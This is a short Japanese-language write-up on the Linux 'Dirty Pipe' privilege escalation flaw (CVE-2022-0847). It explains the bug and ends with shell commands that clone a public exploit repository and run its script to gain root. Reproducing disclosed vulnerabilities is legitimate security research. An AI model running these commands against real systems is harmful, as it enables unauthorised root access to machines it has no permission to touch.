
CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 は Linux カーネル 5.8 以降のバージョンに存在するローカル権限昇格の脆弱性です。攻撃者はこの脆弱性を悪用することで、任意の読み取り可能なファイル内のデータを上書きでき、通常権限のユーザーを特権 root に昇格させることができます。 CVE-2022-0847 の脆弱性の原理は CVE-2016-5195 の Dirty Cow(ダーティ・カウ)脆弱性に似ていますが、より悪用が容易です。脆弱性の作者はこの脆弱性を「Dirty Pipe」と命名しました。
CVE-2022-0847の簡単な再現
公開元の原文アドレス:https://dirtypipe.cm4all.com/
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
